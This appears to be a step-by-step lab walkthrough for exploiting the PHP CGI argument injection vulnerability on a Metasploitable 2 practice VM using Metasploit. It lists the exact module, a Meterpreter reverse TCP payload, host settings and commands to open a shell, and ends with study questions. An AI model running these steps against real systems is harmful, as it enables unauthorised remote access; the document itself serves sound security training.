Apache (CGI Argument Injection)
Apache (CGI Argument Injection)
Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Requirements
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Use the module
use exploit/multi/http/php_cgi_arg_injection
set PAYLOAD php/meterpreter/reverse_tcp
(this may be optional if your already have a payload configured when you select the module)
3. Check the module options
options
4. Set the appropriate options
set RHOSTS 192.168.8.142
set LHOST 192.168.8.147
5. Run the exploit
exploit
6. Meterpreter session
Now you have a meterpreter session opened. This session will allow you to interact with the target.
7. Open a shell on the target machine
shell
Video
Video that resumes everything on this laboratory.
Questions
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Try to learn more about this vulnerability.
Last updated